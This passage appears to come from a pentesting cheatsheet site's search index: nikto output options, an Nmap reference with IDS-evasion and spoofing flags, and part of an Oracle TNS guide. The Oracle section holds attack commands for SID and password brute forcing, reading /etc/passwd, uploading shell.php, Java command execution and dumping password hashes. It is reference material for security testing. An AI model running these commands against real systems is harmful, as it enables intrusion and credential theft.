requests\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-ask no\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDon\u0026rsquo;t prompt to submit findings\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-update\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eUpdate plugins / databases\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-list-plugins\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eList installed plugins\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"output\"\u003eOutput\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enikto -h https://target.tld -o report.html -Format htm\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enikto -h \u0026lt;ip\u0026gt; -o nikto.json -Format json\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enikto -h \u0026lt;ip\u0026gt; -o nikto.xml -Format xml\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enikto -h \u0026lt;ip\u0026gt; -o nikto.csv -Format csv\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\u003ccode\u003e-Display\u003c/code\u003e flags (combine, e.g. \u003ccode\u003e-Display 1V\u003c/code\u003e):\u003c/p\u003e","title":"nikto"},{"content":"Nmap Cheatsheet Default Ports: N/A (scanner tool)\nScan Types Flag Description -sS SYN scan (stealth, default with root) -sT TCP connect scan (no root needed) -sU UDP scan -sV Service/version detection -sC Default scripts -sA ACK scan (firewall mapping) -sN NULL scan -sF FIN scan -sX Xmas scan -sn Ping sweep (no port scan) -O OS detection -A Aggressive (OS + version + scripts + traceroute) Port Specification nmap -p 22 # Single port nmap -p 22,80,443 # Multiple ports nmap -p 1-1024 # Port range nmap -p- # All 65535 ports nmap --top-ports 1000 # Top 1000 ports nmap -F # Fast scan (top 100) Timing Templates Flag Name Description -T0 Paranoid IDS evasion, very slow -T1 Sneaky Slow, IDS evasion -T2 Polite Slower, less bandwidth -T3 Normal Default -T4 Aggressive Faster, reliable network -T5 Insane Very fast, may miss results Output Formats nmap -oN output.txt # Normal output nmap -oX output.xml # XML output nmap -oG output.gnmap # Grepable output nmap -oA output # All formats at once Host Discovery nmap -sn 192.168.1.0/24 # Ping sweep nmap -PS22,80,443 192.168.1.0/24 # TCP SYN ping nmap -PA80 192.168.1.0/24 # TCP ACK ping nmap -PU53 192.168.1.0/24 # UDP ping nmap -PE 192.168.1.0/24 # ICMP echo ping nmap --disable-arp-ping 192.168.1.1 # Skip ARP discovery Evasion \u0026amp; Spoofing nmap -D RND:5 \u0026lt;target\u0026gt; # Decoy scan (5 random decoys) nmap -D decoy1,decoy2 \u0026lt;target\u0026gt; # Named decoys nmap -S \u0026lt;spoof-ip\u0026gt; \u0026lt;target\u0026gt; # Spoof source IP nmap --spoof-mac 0 \u0026lt;target\u0026gt; # Random MAC spoof nmap -f \u0026lt;target\u0026gt; # Fragment packets nmap --mtu 24 \u0026lt;target\u0026gt; # Custom MTU (must be multiple of 8) nmap --data-length 25 \u0026lt;target\u0026gt; # Append random data to packets nmap --scan-delay 5s \u0026lt;target\u0026gt; # Delay between probes nmap -sI \u0026lt;zombie\u0026gt; \u0026lt;target\u0026gt; # Idle/zombie scan nmap --proxies socks4://host:port # Route through proxy NSE Scripts nmap --script=\u0026lt;name\u0026gt; \u0026lt;target\u0026gt; # Run specific script nmap --script=\u0026lt;category\u0026gt; \u0026lt;target\u0026gt; # Run entire category nmap --script-help=\u0026lt;name\u0026gt; # Get help for a script nmap --script-updatedb # Update script database # Script categories: # auth, broadcast, brute, default, discovery, # dos, exploit, external, fuzzer, intrusive, # malware, safe, version, vuln Common Scan Combos # Quick full port scan nmap -p- --min-rate 5000 -T4 \u0026lt;target\u0026gt; # Detailed enum after port discovery nmap -p \u0026lt;ports\u0026gt; -sV -sC -O \u0026lt;target\u0026gt; # Aggressive all-in-one nmap -A -p- \u0026lt;target\u0026gt; # Stealth SYN + version detection nmap -sS -sV -p- -T4 \u0026lt;target\u0026gt; # UDP top ports nmap -sU --top-ports 100 \u0026lt;target\u0026gt; # Vulnerability scan nmap --script vuln \u0026lt;target\u0026gt; # Banner grabbing nmap -sV --script banner \u0026lt;target\u0026gt; ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/footprinting/nmap/","summary":"\u003ch1 id=\"nmap-cheatsheet\"\u003eNmap Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eDefault Ports:\u003c/strong\u003e N/A (scanner tool)\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"scan-types\"\u003eScan Types\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eFlag\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-sS\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSYN scan (stealth, default with root)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-sT\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eTCP connect scan (no root needed)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-sU\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eUDP scan\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-sV\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eService/version detection\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-sC\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDefault scripts\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-sA\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eACK scan (firewall mapping)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-sN\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eNULL scan\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-sF\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFIN scan\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-sX\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eXmas scan\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-sn\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePing sweep (no port scan)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-O\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eOS detection\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-A\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAggressive (OS + version + scripts + traceroute)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"port-specification\"\u003ePort Specification\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e22\u003c/span\u003e \u003cspan style=\"color:#75715e\"\u003e# Single port\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p 22,80,443 \u003cspan style=\"color:#75715e\"\u003e# Multiple ports\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p 1-1024 \u003cspan style=\"color:#75715e\"\u003e# Port range\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p- \u003cspan style=\"color:#75715e\"\u003e# All 65535 ports\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap --top-ports \u003cspan style=\"color:#ae81ff\"\u003e1000\u003c/span\u003e \u003cspan style=\"color:#75715e\"\u003e# Top 1000 ports\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -F \u003cspan style=\"color:#75715e\"\u003e# Fast scan (top 100)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"timing-templates\"\u003eTiming Templates\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eFlag\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eName\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-T0\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eParanoid\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eIDS evasion, very slow\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-T1\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSneaky\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSlow, IDS evasion\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-T2\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePolite\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSlower, less bandwidth\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-T3\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eNormal\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDefault\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-T4\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAggressive\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFaster, reliable network\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-T5\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eInsane\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eVery fast, may miss results\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"output-formats\"\u003eOutput Formats\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -oN output.txt \u003cspan style=\"color:#75715e\"\u003e# Normal output\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -oX output.xml \u003cspan style=\"color:#75715e\"\u003e# XML output\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -oG output.gnmap \u003cspan style=\"color:#75715e\"\u003e# Grepable output\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -oA output \u003cspan style=\"color:#75715e\"\u003e# All formats at once\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"host-discovery\"\u003eHost Discovery\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sn 192.168.1.0/24 \u003cspan style=\"color:#75715e\"\u003e# Ping sweep\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -PS22,80,443 192.168.1.0/24 \u003cspan style=\"color:#75715e\"\u003e# TCP SYN ping\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -PA80 192.168.1.0/24 \u003cspan style=\"color:#75715e\"\u003e# TCP ACK ping\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -PU53 192.168.1.0/24 \u003cspan style=\"color:#75715e\"\u003e# UDP ping\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -PE 192.168.1.0/24 \u003cspan style=\"color:#75715e\"\u003e# ICMP echo ping\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap --disable-arp-ping 192.168.1.1 \u003cspan style=\"color:#75715e\"\u003e# Skip ARP discovery\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"evasion--spoofing\"\u003eEvasion \u0026amp; Spoofing\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -D RND:5 \u0026lt;target\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Decoy scan (5 random decoys)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -D decoy1,decoy2 \u0026lt;target\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Named decoys\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -S \u0026lt;spoof-ip\u0026gt; \u0026lt;target\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Spoof source IP\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap --spoof-mac \u003cspan style=\"color:#ae81ff\"\u003e0\u003c/span\u003e \u0026lt;target\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Random MAC spoof\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -f \u0026lt;target\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Fragment packets\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap --mtu \u003cspan style=\"color:#ae81ff\"\u003e24\u003c/span\u003e \u0026lt;target\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Custom MTU (must be multiple of 8)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap --data-length \u003cspan style=\"color:#ae81ff\"\u003e25\u003c/span\u003e \u0026lt;target\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Append random data to packets\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap --scan-delay 5s \u0026lt;target\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Delay between probes\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sI \u0026lt;zombie\u0026gt; \u0026lt;target\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Idle/zombie scan\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap --proxies socks4://host:port \u003cspan style=\"color:#75715e\"\u003e# Route through proxy\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"nse-scripts\"\u003eNSE Scripts\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap --script\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\u0026lt;name\u0026gt; \u0026lt;target\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Run specific script\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap --script\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\u0026lt;category\u0026gt; \u0026lt;target\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Run entire category\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap --script-help\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\u0026lt;name\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Get help for a script\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap --script-updatedb \u003cspan style=\"color:#75715e\"\u003e# Update script database\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Script categories:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# auth, broadcast, brute, default, discovery,\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# dos, exploit, external, fuzzer, intrusive,\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# malware, safe, version, vuln\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"common-scan-combos\"\u003eCommon Scan Combos\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Quick full port scan\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p- --min-rate \u003cspan style=\"color:#ae81ff\"\u003e5000\u003c/span\u003e -T4 \u0026lt;target\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Detailed enum after port discovery\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u0026lt;ports\u0026gt; -sV -sC -O \u0026lt;target\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Aggressive all-in-one\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -A -p- \u0026lt;target\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Stealth SYN + version detection\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sS -sV -p- -T4 \u0026lt;target\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# UDP top ports\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sU --top-ports \u003cspan style=\"color:#ae81ff\"\u003e100\u003c/span\u003e \u0026lt;target\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Vulnerability scan\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap --script vuln \u0026lt;target\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Banner grabbing\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -sV --script banner \u0026lt;target\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e","title":"Nmap"},{"content":"Oracle TNS Enumeration Cheatsheet Default Port: 1521 (TCP)\nNmap Scripts nmap -p 1521 --script oracle-tns-version \u0026lt;ip\u0026gt; nmap -p 1521 --script oracle-sid-brute \u0026lt;ip\u0026gt; nmap -p 1521 --script oracle-brute \u0026lt;ip\u0026gt; nmap -p 1521 --script oracle-brute-stealth \u0026lt;ip\u0026gt; nmap -p 1521 --script oracle-enum-users \\ --script-args oracle-enum-users.sid=\u0026lt;sid\u0026gt; \u0026lt;ip\u0026gt; ODAT (Oracle Database Attacking Tool) # Full automated scan odat all -s \u0026lt;ip\u0026gt; -p 1521 # SID brute force odat sidguesser -s \u0026lt;ip\u0026gt; -p 1521 # Password brute force (after getting SID) odat passwordguesser -s \u0026lt;ip\u0026gt; -p 1521 -d \u0026lt;sid\u0026gt; # File read/write (requires UTL_FILE privilege) odat utlfile -s \u0026lt;ip\u0026gt; -d \u0026lt;sid\u0026gt; -U \u0026lt;user\u0026gt; -P \u0026lt;pass\u0026gt; --getFile /etc/passwd /tmp/passwd.txt odat utlfile -s \u0026lt;ip\u0026gt; -d \u0026lt;sid\u0026gt; -U \u0026lt;user\u0026gt; -P \u0026lt;pass\u0026gt; --putFile /tmp shell.php shell.php # OS command execution (requires Java) odat java -s \u0026lt;ip\u0026gt; -d \u0026lt;sid\u0026gt; -U \u0026lt;user\u0026gt; -P \u0026lt;pass\u0026gt; --exec \u0026#34;whoami\u0026#34; # External table method for file read odat externaltable -s \u0026lt;ip\u0026gt; -d \u0026lt;sid\u0026gt; -U \u0026lt;user\u0026gt; -P \u0026lt;pass\u0026gt; --getFile /etc/passwd sqlplus (Direct Connection) # Install: sudo apt install oracle-instantclient-sqlplus # Connect sqlplus \u0026lt;user\u0026gt;/\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt;:\u0026lt;port\u0026gt;/\u0026lt;sid\u0026gt; sqlplus \u0026lt;user\u0026gt;/\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt;:\u0026lt;port\u0026gt;/\u0026lt;sid\u0026gt; as sysdba sqlplus \u0026lt;user\u0026gt;/\u0026lt;pass\u0026gt;@//\u0026lt;ip\u0026gt;:\u0026lt;port\u0026gt;/\u0026lt;service_name\u0026gt; Common SIDs to Try XE ORCL DB DATABASE PROD TEST DEV ORACLE OEMREP ORACLR_CONNECTION_DATA Enumeration Queries (Once Connected) -- Version and user SELECT * FROM v$version; SELECT user FROM dual; SELECT * FROM session_privs; -- Database objects SELECT * FROM all_tables; SELECT owner, table_name FROM all_tables WHERE owner != \u0026#39;SYS\u0026#39;; SELECT column_name, data_type FROM all_tab_columns WHERE table_name = \u0026#39;\u0026lt;TABLE\u0026gt;\u0026#39;; -- Users and privileges SELECT username FROM dba_users; SELECT * FROM user_role_privs; SELECT * FROM dba_sys_privs WHERE grantee = \u0026#39;\u0026lt;user\u0026gt;\u0026#39;; -- Password hashes (as SYSDBA) SELECT name, password FROM sys.user$; SELECT name, spare4 FROM sys.user$; -- SHA-1 hashes (11g+) -- Check for DBA role SELECT * FROM session_privs WHERE privilege = \u0026#39;CREATE SESSION\u0026#39;; Privilege Escalation via Java -- Grant Java permissions (as DBA) EXEC dbms_java.grant_permission(\u0026#39;SCOTT\u0026#39;, \u0026#39;SYS:java.io.FilePermission\u0026#39;, \u0026#39;\u0026lt;\u0026lt;ALL FILES\u0026gt;\u0026gt;\u0026#39;, \u0026#39;execute\u0026#39;); EXEC dbms_java.grant_permission(\u0026#39;SCOTT\u0026#39;, \u0026#39;SYS:java.lang.RuntimePermission\u0026#39;, \u0026#39;writeFileDescriptor\u0026#39;, \u0026#39;\u0026#39;); EXEC dbms_java.grant_permission(\u0026#39;SCOTT\u0026#39;, \u0026#39;SYS:java.lang.RuntimePermission\u0026#39;, \u0026#39;readFileDescriptor\u0026#39;, \u0026#39;\u0026#39;); -- Execute OS command via Java SELECT dbms_java.runjava(\u0026#39;oracle/aurora/util/Wrapper /bin/bash -c \u0026#34;id \u0026gt; /tmp/out\u0026#34;\u0026#39;) FROM dual; Brute Force hydra -l \u0026lt;user\u0026gt; -P wordlist.txt -s 1521 oracle://\u0026lt;ip\u0026gt;/\u0026lt;sid\u0026gt; nmap -p 1521 --script 